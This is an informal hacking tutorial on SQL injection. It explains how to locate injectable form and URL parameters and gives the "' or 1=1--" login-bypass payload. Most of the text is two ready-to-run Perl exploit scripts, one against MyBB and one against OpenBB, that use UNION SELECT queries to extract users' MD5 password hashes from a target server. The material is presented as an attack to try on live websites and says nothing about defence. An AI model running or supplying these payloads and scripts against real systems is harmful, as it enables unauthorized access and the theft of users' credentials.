Let us talk about SQL Injection. It is a very pure hack, in that you are truely outsmarting a system with it. All you need is a webbrowser to excicute this attack. Before reading this, I would recommend reading Hacking Cardomain and Facebook so you get an idea for HTML injection

First, look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise). These pages will have file types like ASP, JSP, CGI, PL, or PHP. Try to look especially for URL that takes parameters, like:

http://website/index.asp?id=10

Now, here is an example of SQL injection, to give an example of how SQL injection works. Start with the "single quote trick." Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://website/index.asp?id=hi' or 1=1--


If luck is on your side, you will get login without any login name or password. The reason this works, is the host machine thinks the field you have input is part of the logic statement in it's code. For instance, it will say, "Allow a user in, if his password is 'correct'" but with your added code, the script will say "Allow a user in, if his password is 'correcthi' or 1=1". Of course 1=1, so you are let in.

Now I will show some examples of automatic SQL Injection. This is a MyBulletinBoard injector that will show the MD5 password of the user id you have chosen. This was discovered by Alberto Trivero and coded with FAin182.

#---------------------------------------start code

use LWP::Simple;

if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\n Example:\nperl $0 http://www.example.com/mybb/ 1\n";
exit(0);
}
$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,". "null,null,null,password,null%20FROM%20". "mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

#---------------------------------------end code

Following, is a very simple code that should be an easy illustrator of SQL Injection. This was writen by x97Rang and is to work on OpenBB with mysql

#---------------------------------------start code

#!/usr/bin/perl -w
use IO::Socket;
if (@ARGV != 3)
{
print "\nUsage: $0 [server] [path] [id]\n";
print "like $0 forum.mysite.com / 1\n";
print "If found nothing - forum NOT vulnerable\n\n";
exit ();
}
$server = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?CID=999+union+select+1,". "1,password,1,1,1,1,1,1,1,1,id,". "1+from+profiles+where+id=". "$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$id);
while(<$socket>)
{
if (/\>(\w{32})\</) { print "$1\n"; }
}

#---------------------------------------end code